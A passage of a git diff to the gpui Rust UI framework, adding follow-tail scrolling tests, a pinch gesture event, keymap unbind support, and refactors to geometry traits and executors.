Enable follow-tail — this should immediately snap the scroll anchor + // to the end, like the user just sent a prompt. + state.set_follow_mode(FollowMode::Tail); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.into_any_element() + }); + + // After paint, scroll should be at the bottom. + // 500px total − 200px viewport = 300px offset → item 6, offset 0. 
+ let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 6); + assert_eq!(offset.offset_in_item, px(0.)); + assert!(state.is_following_tail()); + } + + #[gpui::test] + fn test_bottom_aligned_scrollbar_offset_at_end(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + const ITEMS: usize = 10; + const ITEM_SIZE: f32 = 50.0; + + let state = ListState::new( + ITEMS, + crate::ListAlignment::Bottom, + px(ITEMS as f32 * ITEM_SIZE), + ); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(ITEM_SIZE)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(100.)), |_, cx| { + cx.new(|_| TestView(state.clone())).into_any_element() + }); + + // Bottom-aligned lists start pinned to the end: logical_scroll_top returns + // item_ix == item_count, meaning no explicit scroll position has been set. + assert_eq!(state.logical_scroll_top().item_ix, ITEMS); + + let max_offset = state.max_offset_for_scrollbar(); + let scroll_offset = state.scroll_px_offset_for_scrollbar(); + + assert_eq!( + -scroll_offset.y, max_offset.y, + "scrollbar offset ({}) should equal max offset ({}) when list is pinned to bottom", + -scroll_offset.y, max_offset.y, + ); + } + + /// When the user scrolls away from the bottom during follow_tail, + /// follow_tail suspends. If they scroll back to the bottom, the + /// next paint should re-engage follow_tail using fresh measurements. + #[gpui::test] + fn test_follow_tail_reengages_when_scrolled_back_to_bottom(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items × 50px = 500px total, 200px viewport. 
+ let state = ListState::new(10, crate::ListAlignment::Top, px(0.)); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + state.set_follow_mode(FollowMode::Tail); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!(state.is_following_tail()); + + // Scroll up — follow_tail should suspend (not fully disengage). + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(50.))), + ..Default::default() + }); + assert!(!state.is_following_tail()); + + // Scroll back down to the bottom. + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(-10000.))), + ..Default::default() + }); + + // After a paint, follow_tail should re-engage because the + // layout confirmed we're at the true bottom. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!( + state.is_following_tail(), + "follow_tail should re-engage after scrolling back to the bottom" + ); + } + + /// When an item is spliced to unmeasured (0px) while follow_tail + /// is suspended, the re-engagement check should still work correctly + #[gpui::test] + fn test_follow_tail_reengagement_not_fooled_by_unmeasured_items(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 20 items × 50px = 1000px total, 200px viewport, 1000px + // overdraw so all items get measured during the follow_tail + // paint (matching realistic production settings). 
+ let state = ListState::new(20, crate::ListAlignment::Top, px(1000.)); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + state.set_follow_mode(FollowMode::Tail); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!(state.is_following_tail()); + + // Scroll up a meaningful amount — suspends follow_tail. + // 20 items × 50px = 1000px. viewport 200px. scroll_max = 800px. + // Scrolling up 200px puts us at 600px, clearly not at bottom. + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(200.))), + ..Default::default() + }); + assert!(!state.is_following_tail()); + + // Invalidate the last item (simulates EntryUpdated calling + // remeasure_items). This makes items.summary().height + // temporarily wrong (0px for the invalidated item). + state.remeasure_items(19..20); + + // Paint — layout re-measures the invalidated item with its true + // height. The re-engagement check uses these fresh measurements. + // Since we scrolled 200px up from the 800px max, we're at + // ~600px — NOT at the bottom, so follow_tail should NOT + // re-engage. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!( + !state.is_following_tail(), + "follow_tail should not falsely re-engage due to an unmeasured item \ + reducing items.summary().height" + ); + } + + /// Calling `set_follow_mode(FollowState::Normal)` or dragging the scrollbar should + /// fully disengage follow_tail — clearing any suspended state so + /// follow_tail won’t auto-re-engage. 
+ #[gpui::test] + fn test_follow_tail_suspended_state_cleared_by_explicit_actions(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items × 50px = 500px total, 200px viewport. + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)).measure_all(); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + state.set_follow_mode(FollowMode::Tail); + // --- Part 1: set_follow_mode(FollowState::Normal) clears suspended state --- + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + + // Scroll up — suspends follow_tail. + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(50.))), + ..Default::default() + }); + assert!(!state.is_following_tail()); + + // Scroll back to the bottom — should re-engage follow_tail. + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(-10000.))), + ..Default::default() + }); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!( + state.is_following_tail(), + "follow_tail should re-engage after scrolling back to the bottom" + ); + + // --- Part 2: scrollbar drag clears suspended state --- + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + + // Drag the scrollbar to the middle — should clear suspended state. + state.set_offset_from_scrollbar(point(px(0.), px(150.))); + + // Scroll to the bottom. 
+ cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(-10000.))), + ..Default::default() + }); + + // Paint — should NOT re-engage because the scrollbar drag + // cleared the suspended state. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!( + !state.is_following_tail(), + "follow_tail should not re-engage after scrollbar drag cleared the suspended state" + ); + } } diff --git a/crates/gpui/src/elements/svg.rs b/crates/gpui/src/elements/svg.rs index dff389fb93fe7abd2862be70731cc9e6fb613e94..a29b106c0e223b01340ecab27b45fdb94163d207 100644 --- a/crates/gpui/src/elements/svg.rs +++ b/crates/gpui/src/elements/svg.rs @@ -3,8 +3,7 @@ use std::{fs, path::Path, sync::Arc}; use crate::{ App, Asset, Bounds, Element, GlobalElementId, Hitbox, InspectorElementId, InteractiveElement, Interactivity, IntoElement, LayoutId, Pixels, Point, Radians, SharedString, Size, - StyleRefinement, Styled, TransformationMatrix, Window, geometry::Negate as _, point, px, - radians, size, + StyleRefinement, Styled, TransformationMatrix, Window, point, px, radians, size, }; use gpui_util::ResultExt; @@ -254,7 +253,7 @@ impl Transformation { .translate(center.scale(scale_factor) + self.translate.scale(scale_factor)) .rotate(self.rotate) .scale(self.scale) - .translate(center.scale(scale_factor).negate()) + .translate(center.scale(-scale_factor)) } } diff --git a/crates/gpui/src/elements/text.rs b/crates/gpui/src/elements/text.rs index ded0f596dcea2f6c992961906503adb6829e885f..49036abfec1cb3145ce72d2aabe7683e308f1ed0 100644 --- a/crates/gpui/src/elements/text.rs +++ b/crates/gpui/src/elements/text.rs @@ -246,7 +246,12 @@ impl StyledText { pub fn with_runs(mut self, runs: Vec) -> Self { let mut text = &**self.text; for run in &runs { - text = text.get(run.len..).expect("invalid text run"); + text = text.get(run.len..).unwrap_or_else(|| { + #[cfg(debug_assertions)] + 
panic!("invalid text run. Text: '{text}', run: {run:?}"); + #[cfg(not(debug_assertions))] + panic!("invalid text run"); + }); } assert!(text.is_empty(), "invalid text run"); self.runs = Some(runs); diff --git a/crates/gpui/src/executor.rs b/crates/gpui/src/executor.rs index 31c1ed80b92efb5dfa9ead6dcaf9050fe68ea399..f66f58447879afb86b721a9d6d7d2c59c65a8953 100644 --- a/crates/gpui/src/executor.rs +++ b/crates/gpui/src/executor.rs @@ -129,9 +129,11 @@ impl BackgroundExecutor { } } - /// Close this executor. Tasks will not run after this is called. - pub fn close(&self) { - self.inner.close(); + /// Returns the underlying scheduler::BackgroundExecutor. + /// + /// This is used by Ex to pass the executor to thread/worktree code. + pub fn scheduler_executor(&self) -> scheduler::BackgroundExecutor { + self.inner.clone() } /// Enqueues the given future to be run to completion on a background thread. @@ -173,7 +175,6 @@ impl BackgroundExecutor { { use crate::RunnableMeta; use parking_lot::{Condvar, Mutex}; - use std::sync::{Arc, atomic::AtomicBool}; struct NotifyOnDrop<'a>(&'a (Condvar, Mutex)); @@ -197,14 +198,13 @@ impl BackgroundExecutor { let dispatcher = self.dispatcher.clone(); let location = core::panic::Location::caller(); - let closed = Arc::new(AtomicBool::new(false)); let pair = &(Condvar::new(), Mutex::new(false)); let _wait_guard = WaitOnDrop(pair); let (runnable, task) = unsafe { async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn_unchecked( move |_| async { let _notify_guard = NotifyOnDrop(pair); @@ -404,11 +404,6 @@ impl ForegroundExecutor { } } - /// Close this executor. Tasks will not run after this is called. - pub fn close(&self) { - self.inner.close(); - } - /// Enqueues the given Task to run on the main thread. 
#[track_caller] pub fn spawn(&self, future: impl Future + 'static) -> Task @@ -595,144 +590,4 @@ mod test { "Task should run normally when app is alive" ); } - - #[test] - fn test_task_cancelled_when_app_dropped() { - let (dispatcher, _background_executor, app) = create_test_app(); - let foreground_executor = app.borrow().foreground_executor.clone(); - let app_weak = Rc::downgrade(&app); - - let task_ran = Rc::new(RefCell::new(false)); - let task_ran_clone = Rc::clone(&task_ran); - - foreground_executor - .spawn(async move { - *task_ran_clone.borrow_mut() = true; - }) - .detach(); - - drop(app); - - assert!(app_weak.upgrade().is_none(), "App should have been dropped"); - - dispatcher.run_until_parked(); - - // The task should have been cancelled, not run - assert!( - !*task_ran.borrow(), - "Task should have been cancelled when app was dropped, but it ran!" - ); - } - - #[test] - fn test_nested_tasks_both_cancel() { - let (dispatcher, _background_executor, app) = create_test_app(); - let foreground_executor = app.borrow().foreground_executor.clone(); - let app_weak = Rc::downgrade(&app); - - let outer_completed = Rc::new(RefCell::new(false)); - let inner_completed = Rc::new(RefCell::new(false)); - let reached_await = Rc::new(RefCell::new(false)); - - let outer_flag = Rc::clone(&outer_completed); - let inner_flag = Rc::clone(&inner_completed); - let await_flag = Rc::clone(&reached_await); - - // Channel to block the inner task until we're ready - let (tx, rx) = futures::channel::oneshot::channel::<()>(); - - let inner_executor = foreground_executor.clone(); - - foreground_executor - .spawn(async move { - let inner_task = inner_executor.spawn({ - let inner_flag = Rc::clone(&inner_flag); - async move { - rx.await.ok(); - *inner_flag.borrow_mut() = true; - } - }); - - *await_flag.borrow_mut() = true; - - inner_task.await; - - *outer_flag.borrow_mut() = true; - }) - .detach(); - - // Run dispatcher until outer task reaches the await point - // The inner task will be 
blocked on the channel - dispatcher.run_until_parked(); - - // Verify we actually reached the await point before dropping the app - assert!( - *reached_await.borrow(), - "Outer task should have reached the await point" - ); - - // Neither task should have completed yet - assert!( - !*outer_completed.borrow(), - "Outer task should not have completed yet" - ); - assert!( - !*inner_completed.borrow(), - "Inner task should not have completed yet" - ); - - // Drop the channel sender and app while outer is awaiting inner - drop(tx); - drop(app); - assert!(app_weak.upgrade().is_none(), "App should have been dropped"); - - // Run dispatcher - both tasks should be cancelled - dispatcher.run_until_parked(); - - // Neither task should have completed (both were cancelled) - assert!( - !*outer_completed.borrow(), - "Outer task should have been cancelled, not completed" - ); - assert!( - !*inner_completed.borrow(), - "Inner task should have been cancelled, not completed" - ); - } - - #[test] - #[should_panic] - fn test_polling_cancelled_task_panics() { - let (dispatcher, _background_executor, app) = create_test_app(); - let foreground_executor = app.borrow().foreground_executor.clone(); - let app_weak = Rc::downgrade(&app); - - let task = foreground_executor.spawn(async move { 42 }); - - drop(app); - - assert!(app_weak.upgrade().is_none(), "App should have been dropped"); - - dispatcher.run_until_parked(); - - foreground_executor.block_on(task); - } - - #[test] - fn test_polling_cancelled_task_returns_none_with_fallible() { - let (dispatcher, _background_executor, app) = create_test_app(); - let foreground_executor = app.borrow().foreground_executor.clone(); - let app_weak = Rc::downgrade(&app); - - let task = foreground_executor.spawn(async move { 42 }).fallible(); - - drop(app); - - assert!(app_weak.upgrade().is_none(), "App should have been dropped"); - - dispatcher.run_until_parked(); - - let result = foreground_executor.block_on(task); - assert_eq!(result, None, "Cancelled 
task should return None"); - } } diff --git a/crates/gpui/src/geometry.rs b/crates/gpui/src/geometry.rs index 73fa9906267412c9f1c840d8403beeef4718119e..76157a06a587ac851d19f19fc5a4ed23c634bab5 100644 --- a/crates/gpui/src/geometry.rs +++ b/crates/gpui/src/geometry.rs @@ -78,6 +78,7 @@ pub trait Along { Deserialize, JsonSchema, Hash, + Neg, )] #[refineable(Debug, PartialEq, Serialize, Deserialize, JsonSchema)] #[repr(C)] @@ -182,12 +183,6 @@ impl Along for Point { } } -impl Negate for Point { - fn negate(self) -> Self { - self.map(Negate::negate) - } -} - impl Point { /// Scales the point by a given factor, which is typically derived from the resolution /// of a target display to ensure proper sizing of UI elements. @@ -393,7 +388,9 @@ impl Display for Point { /// /// This struct is generic over the type `T`, which can be any type that implements `Clone`, `Default`, and `Debug`. /// It is commonly used to specify dimensions for elements in a UI, such as a window or element. -#[derive(Refineable, Default, Clone, Copy, PartialEq, Div, Hash, Serialize, Deserialize)] +#[derive( + Add, Clone, Copy, Default, Deserialize, Div, Hash, Neg, PartialEq, Refineable, Serialize, Sub, +)] #[refineable(Debug, PartialEq, Serialize, Deserialize, JsonSchema)] #[repr(C)] pub struct Size { @@ -598,34 +595,6 @@ where } } -impl Sub for Size -where - T: Sub + Clone + Debug + Default + PartialEq, -{ - type Output = Size; - - fn sub(self, rhs: Self) -> Self::Output { - Size { - width: self.width - rhs.width, - height: self.height - rhs.height, - } - } -} - -impl Add for Size -where - T: Add + Clone + Debug + Default + PartialEq, -{ - type Output = Size; - - fn add(self, rhs: Self) -> Self::Output { - Size { - width: self.width + rhs.width, - height: self.height + rhs.height, - } - } -} - impl Mul for Size where T: Mul + Clone + Debug + Default + PartialEq, @@ -1245,6 +1214,15 @@ where } } +impl From> for Point { + fn from(size: Size) -> Self { + Self { + x: size.width, + y: size.height, + } + 
} +} + impl Bounds where T: Add + Clone + Debug + Default + PartialEq, @@ -3754,48 +3732,6 @@ impl Half for Rems { } } -/// Provides a trait for types that can negate their values. -pub trait Negate { - /// Returns the negation of the given value - fn negate(self) -> Self; -} - -impl Negate for i32 { - fn negate(self) -> Self { - -self - } -} - -impl Negate for f32 { - fn negate(self) -> Self { - -self - } -} - -impl Negate for DevicePixels { - fn negate(self) -> Self { - Self(-self.0) - } -} - -impl Negate for ScaledPixels { - fn negate(self) -> Self { - Self(-self.0) - } -} - -impl Negate for Pixels { - fn negate(self) -> Self { - Self(-self.0) - } -} - -impl Negate for Rems { - fn negate(self) -> Self { - Self(-self.0) - } -} - /// A trait for checking if a value is zero. /// /// This trait provides a method to determine if a value is considered to be zero. diff --git a/crates/gpui/src/gpui.rs b/crates/gpui/src/gpui.rs index af3fb51ce51f7df570a8e28faad23018ed7dc778..6d7d801cd42c3639d7892295a660319d21b05dfa 100644 --- a/crates/gpui/src/gpui.rs +++ b/crates/gpui/src/gpui.rs @@ -1,5 +1,5 @@ #![doc = include_str!("../README.md")] -#![deny(missing_docs)] +#![warn(missing_docs)] #![allow(clippy::type_complexity)] // Not useful, GPUI makes heavy use of callbacks #![allow(clippy::collapsible_else_if)] // False positives in platform specific code #![allow(unused_mut)] // False positives in platform specific code @@ -54,6 +54,9 @@ mod util; mod view; mod window; +#[cfg(any(test, feature = "test-support"))] +pub use proptest; + #[cfg(doc)] pub mod _ownership_and_data_flow; @@ -86,7 +89,9 @@ pub use elements::*; pub use executor::*; pub use geometry::*; pub use global::*; -pub use gpui_macros::{AppContext, IntoElement, Render, VisualContext, register_action, test}; +pub use gpui_macros::{ + AppContext, IntoElement, Render, VisualContext, property_test, register_action, test, +}; pub use gpui_util::arc_cow::ArcCow; pub use http_client; pub use input::*; diff --git 
a/crates/gpui/src/input.rs b/crates/gpui/src/input.rs index c9c0a85cad2283c07af094e0f742c580341758ec..10ca46501d8a8206dee38e4e4a249931591ba631 100644 --- a/crates/gpui/src/input.rs +++ b/crates/gpui/src/input.rs @@ -187,4 +187,9 @@ impl InputHandler for ElementInputHandler { self.view .update(cx, |view, cx| view.accepts_text_input(window, cx)) } + + fn prefers_ime_for_printable_keys(&mut self, window: &mut Window, cx: &mut App) -> bool { + self.view + .update(cx, |view, cx| view.accepts_text_input(window, cx)) + } } diff --git a/crates/gpui/src/interactive.rs b/crates/gpui/src/interactive.rs index 5316a5992bb41d11ef5b6518555a9a20795f894c..0c7f2f9c97c59f90f8e037f069357dcc3c60c9cd 100644 --- a/crates/gpui/src/interactive.rs +++ b/crates/gpui/src/interactive.rs @@ -17,6 +17,9 @@ pub trait KeyEvent: InputEvent {} /// A mouse event from the platform. pub trait MouseEvent: InputEvent {} +/// A gesture event from the platform. +pub trait GestureEvent: InputEvent {} + /// The key down event equivalent for the platform. #[derive(Clone, Debug, Eq, PartialEq)] pub struct KeyDownEvent { @@ -467,6 +470,43 @@ impl Default for ScrollDelta { } } +/// A pinch gesture event from the platform, generated when the user performs +/// a pinch-to-zoom gesture (typically on a trackpad). +/// +#[derive(Clone, Debug, Default)] +pub struct PinchEvent { + /// The position of the pinch center on the window. + pub position: Point, + + /// The zoom delta for this event. + /// Positive values indicate zooming in, negative values indicate zooming out. + /// For example, 0.1 represents a 10% zoom increase. + pub delta: f32, + + /// The modifiers that were held down during the pinch gesture. + pub modifiers: Modifiers, + + /// The phase of the pinch gesture. 
+ pub phase: TouchPhase, +} + +impl Sealed for PinchEvent {} +impl InputEvent for PinchEvent { + fn to_platform_input(self) -> PlatformInput { + PlatformInput::Pinch(self) + } +} +impl GestureEvent for PinchEvent {} +impl MouseEvent for PinchEvent {} + +impl Deref for PinchEvent { + type Target = Modifiers; + + fn deref(&self) -> &Self::Target { + &self.modifiers + } +} + impl ScrollDelta { /// Returns true if this is a precise scroll delta in pixels. pub fn precise(&self) -> bool { @@ -626,6 +666,8 @@ pub enum PlatformInput { MouseExited(MouseExitEvent), /// The scroll wheel was used. ScrollWheel(ScrollWheelEvent), + /// A pinch gesture was performed. + Pinch(PinchEvent), /// Files were dragged and dropped onto the window. FileDrop(FileDropEvent), } @@ -642,6 +684,7 @@ impl PlatformInput { PlatformInput::MousePressure(event) => Some(event), PlatformInput::MouseExited(event) => Some(event), PlatformInput::ScrollWheel(event) => Some(event), + PlatformInput::Pinch(event) => Some(event), PlatformInput::FileDrop(event) => Some(event), } } @@ -657,6 +700,7 @@ impl PlatformInput { PlatformInput::MousePressure(_) => None, PlatformInput::MouseExited(_) => None, PlatformInput::ScrollWheel(_) => None, + PlatformInput::Pinch(_) => None, PlatformInput::FileDrop(_) => None, } } diff --git a/crates/gpui/src/key_dispatch.rs b/crates/gpui/src/key_dispatch.rs index 03c7eaaaae6e16f8a9c3f486b0a7b863e0c86416..fee75d5dad39df5cb6c2df2729811a1d942d2fe8 100644 --- a/crates/gpui/src/key_dispatch.rs +++ b/crates/gpui/src/key_dispatch.rs @@ -629,66 +629,99 @@ mod tests { use std::{cell::RefCell, ops::Range, rc::Rc}; use crate::{ - Action, ActionRegistry, App, Bounds, Context, DispatchTree, FocusHandle, InputHandler, - IntoElement, KeyBinding, KeyContext, Keymap, Pixels, Point, Render, Subscription, - TestAppContext, UTF16Selection, Window, + ActionRegistry, App, Bounds, Context, DispatchTree, FocusHandle, InputHandler, IntoElement, + KeyBinding, KeyContext, Keymap, Pixels, Point, Render, 
Subscription, TestAppContext, + UTF16Selection, Unbind, Window, }; - #[derive(PartialEq, Eq)] - struct TestAction; + actions!(dispatch_test, [TestAction, SecondaryTestAction]); - impl Action for TestAction { - fn name(&self) -> &'static str { - "test::TestAction" - } - - fn name_for_type() -> &'static str - where - Self: ::std::marker::Sized, - { - "test::TestAction" - } - - fn partial_eq(&self, action: &dyn Action) -> bool { - action.as_any().downcast_ref::() == Some(self) - } - - fn boxed_clone(&self) -> std::boxed::Box { - Box::new(TestAction) - } + fn test_dispatch_tree(bindings: Vec) -> DispatchTree { + let registry = ActionRegistry::default(); - fn build(_value: serde_json::Value) -> anyhow::Result> - where - Self: Sized, - { - Ok(Box::new(TestAction)) - } + DispatchTree::new( + Rc::new(RefCell::new(Keymap::new(bindings))), + Rc::new(registry), + ) } #[test] fn test_keybinding_for_action_bounds() { - let keymap = Keymap::new(vec![KeyBinding::new( + let tree = test_dispatch_tree(vec![KeyBinding::new( "cmd-n", TestAction, Some("ProjectPanel"), )]); - let mut registry = ActionRegistry::default(); + let contexts = vec![ + KeyContext::parse("Workspace").unwrap(), + KeyContext::parse("ProjectPanel").unwrap(), + ]; + + let keybinding = tree.bindings_for_action(&TestAction, &contexts); + + assert!(keybinding[0].action.partial_eq(&TestAction)) + } + + #[test] + fn test_bindings_for_action_hides_targeted_unbind_in_active_context() { + let tree = test_dispatch_tree(vec![ + KeyBinding::new("tab", TestAction, Some("Editor")), + KeyBinding::new( + "tab", + Unbind("dispatch_test::TestAction".into()), + Some("Editor && edit_prediction"), + ), + KeyBinding::new( + "tab", + SecondaryTestAction, + Some("Editor && showing_completions"), + ), + ]); + + let contexts = vec![ + KeyContext::parse("Workspace").unwrap(), + KeyContext::parse("Editor showing_completions edit_prediction").unwrap(), + ]; - registry.load_action::(); + let bindings = tree.bindings_for_action(&TestAction, 
&contexts); + assert!(bindings.is_empty()); - let keymap = Rc::new(RefCell::new(keymap)); + let highest = tree.highest_precedence_binding_for_action(&TestAction, &contexts); + assert!(highest.is_none()); + + let fallback_bindings = tree.bindings_for_action(&SecondaryTestAction, &contexts); + assert_eq!(fallback_bindings.len(), 1); + assert!(fallback_bindings[0].action.partial_eq(&SecondaryTestAction)); + } - let tree = DispatchTree::new(keymap, Rc::new(registry)); + #[test] + fn test_bindings_for_action_keeps_targeted_binding_outside_unbind_context() { + let tree = test_dispatch_tree(vec![ + KeyBinding::new("tab", TestAction, Some("Editor")), + KeyBinding::new( + "tab", + Unbind("dispatch_test::TestAction".into()), + Some("Editor && edit_prediction"), + ), + KeyBinding::new( + "tab", + SecondaryTestAction, + Some("Editor && showing_completions"), + ), + ]); let contexts = vec![ KeyContext::parse("Workspace").unwrap(), - KeyContext::parse("ProjectPanel").unwrap(), + KeyContext::parse("Editor").unwrap(), ]; - let keybinding = tree.bindings_for_action(&TestAction, &contexts); + let bindings = tree.bindings_for_action(&TestAction, &contexts); + assert_eq!(bindings.len(), 1); + assert!(bindings[0].action.partial_eq(&TestAction)); - assert!(keybinding[0].action.partial_eq(&TestAction)) + let highest = tree.highest_precedence_binding_for_action(&TestAction, &contexts); + assert!(highest.is_some_and(|binding| binding.action.partial_eq(&TestAction))); } #[test] @@ -698,10 +731,7 @@ mod tests { KeyBinding::new("space", TestAction, Some("ContextA")), KeyBinding::new("space f g", TestAction, Some("ContextB")), ]; - let keymap = Rc::new(RefCell::new(Keymap::new(bindings))); - let mut registry = ActionRegistry::default(); - registry.load_action::(); - let mut tree = DispatchTree::new(keymap, Rc::new(registry)); + let mut tree = test_dispatch_tree(bindings); type DispatchPath = SmallVec<[super::DispatchNodeId; 32]>; fn dispatch( diff --git a/crates/gpui/src/keymap.rs 
b/crates/gpui/src/keymap.rs index d5398ff0447849ca5bfcdbbb5a838af0cbc22836..eaf582a0074d4e8d21d46fdeadf44141182405a6 100644 --- a/crates/gpui/src/keymap.rs +++ b/crates/gpui/src/keymap.rs @@ -4,7 +4,7 @@ mod context; pub use binding::*; pub use context::*; -use crate::{Action, AsKeystroke, Keystroke, is_no_action}; +use crate::{Action, AsKeystroke, Keystroke, Unbind, is_no_action, is_unbind}; use collections::{HashMap, HashSet}; use smallvec::SmallVec; use std::any::TypeId; @@ -19,7 +19,7 @@ pub struct KeymapVersion(usize); pub struct Keymap { bindings: Vec, binding_indices_by_action_id: HashMap>, - no_action_binding_indices: Vec, + disabled_binding_indices: Vec, version: KeymapVersion, } @@ -27,6 +27,26 @@ pub struct Keymap { #[derive(Copy, Clone, Debug, Eq, PartialEq, Ord, PartialOrd)] pub struct BindingIndex(usize); +fn disabled_binding_matches_context(disabled_binding: &KeyBinding, binding: &KeyBinding) -> bool { + match ( + &disabled_binding.context_predicate, + &binding.context_predicate, + ) { + (None, _) => true, + (Some(_), None) => false, + (Some(disabled_predicate), Some(predicate)) => disabled_predicate.is_superset(predicate), + } +} + +fn binding_is_unbound(disabled_binding: &KeyBinding, binding: &KeyBinding) -> bool { + disabled_binding.keystrokes == binding.keystrokes + && disabled_binding + .action() + .as_any() + .downcast_ref::() + .is_some_and(|unbind| unbind.0.as_ref() == binding.action.name()) +} + impl Keymap { /// Create a new keymap with the given bindings. 
pub fn new(bindings: Vec) -> Self { @@ -44,8 +64,8 @@ impl Keymap { pub fn add_bindings>(&mut self, bindings: T) { for binding in bindings { let action_id = binding.action().as_any().type_id(); - if is_no_action(&*binding.action) { - self.no_action_binding_indices.push(self.bindings.len()); + if is_no_action(&*binding.action) || is_unbind(&*binding.action) { + self.disabled_binding_indices.push(self.bindings.len()); } else { self.binding_indices_by_action_id .entry(action_id) @@ -62,7 +82,7 @@ impl Keymap { pub fn clear(&mut self) { self.bindings.clear(); self.binding_indices_by_action_id.clear(); - self.no_action_binding_indices.clear(); + self.disabled_binding_indices.clear(); self.version.0 += 1; } @@ -90,21 +110,22 @@ impl Keymap { return None; } - for null_ix in &self.no_action_binding_indices { - if null_ix > ix { - let null_binding = &self.bindings[*null_ix]; - if null_binding.keystrokes == binding.keystrokes { - let null_binding_matches = - match (&null_binding.context_predicate, &binding.context_predicate) { - (None, _) => true, - (Some(_), None) => false, - (Some(null_predicate), Some(predicate)) => { - null_predicate.is_superset(predicate) - } - }; - if null_binding_matches { + for disabled_ix in &self.disabled_binding_indices { + if disabled_ix > ix { + let disabled_binding = &self.bindings[*disabled_ix]; + if disabled_binding.keystrokes != binding.keystrokes { + continue; + } + + if is_no_action(&*disabled_binding.action) { + if disabled_binding_matches_context(disabled_binding, binding) { return None; } + } else if is_unbind(&*disabled_binding.action) + && disabled_binding_matches_context(disabled_binding, binding) + && binding_is_unbound(disabled_binding, binding) + { + return None; } } } @@ -170,6 +191,7 @@ impl Keymap { let mut bindings: SmallVec<[_; 1]> = SmallVec::new(); let mut first_binding_index = None; + let mut unbound_bindings: Vec<&KeyBinding> = Vec::new(); for (_, ix, binding) in matched_bindings { if is_no_action(&*binding.action) { @@ 
-186,6 +208,19 @@ impl Keymap { // For non-user NoAction bindings, continue searching for user overrides continue; } + + if is_unbind(&*binding.action) { + unbound_bindings.push(binding); + continue; + } + + if unbound_bindings + .iter() + .any(|disabled_binding| binding_is_unbound(disabled_binding, binding)) + { + continue; + } + bindings.push(binding.clone()); first_binding_index.get_or_insert(ix); } @@ -197,7 +232,7 @@ impl Keymap { { continue; } - if is_no_action(&*binding.action) { + if is_no_action(&*binding.action) || is_unbind(&*binding.action) { pending.remove(&&binding.keystrokes); continue; } @@ -232,7 +267,10 @@ impl Keymap { match pending { None => None, Some(is_pending) => { - if !is_pending || is_no_action(&*binding.action) { + if !is_pending + || is_no_action(&*binding.action) + || is_unbind(&*binding.action) + { return None; } Some((depth, BindingIndex(ix), binding)) @@ -256,7 +294,7 @@ impl Keymap { mod tests { use super::*; use crate as gpui; - use gpui::NoAction; + use gpui::{NoAction, Unbind}; actions!( test_only, @@ -720,6 +758,76 @@ mod tests { } } + #[test] + fn test_targeted_unbind_ignores_target_context() { + let bindings = [ + KeyBinding::new("tab", ActionAlpha {}, Some("Editor")), + KeyBinding::new("tab", ActionBeta {}, Some("Editor && showing_completions")), + KeyBinding::new( + "tab", + Unbind("test_only::ActionAlpha".into()), + Some("Editor && edit_prediction"), + ), + ]; + + let mut keymap = Keymap::default(); + keymap.add_bindings(bindings); + + let (result, pending) = keymap.bindings_for_input( + &[Keystroke::parse("tab").unwrap()], + &[KeyContext::parse("Editor showing_completions edit_prediction").unwrap()], + ); + + assert!(!pending); + assert_eq!(result.len(), 1); + assert!(result[0].action.partial_eq(&ActionBeta {})); + } + + #[test] + fn test_bindings_for_action_keeps_binding_for_narrower_targeted_unbind() { + let bindings = [ + KeyBinding::new("tab", ActionAlpha {}, Some("Editor")), + KeyBinding::new( + "tab", + 
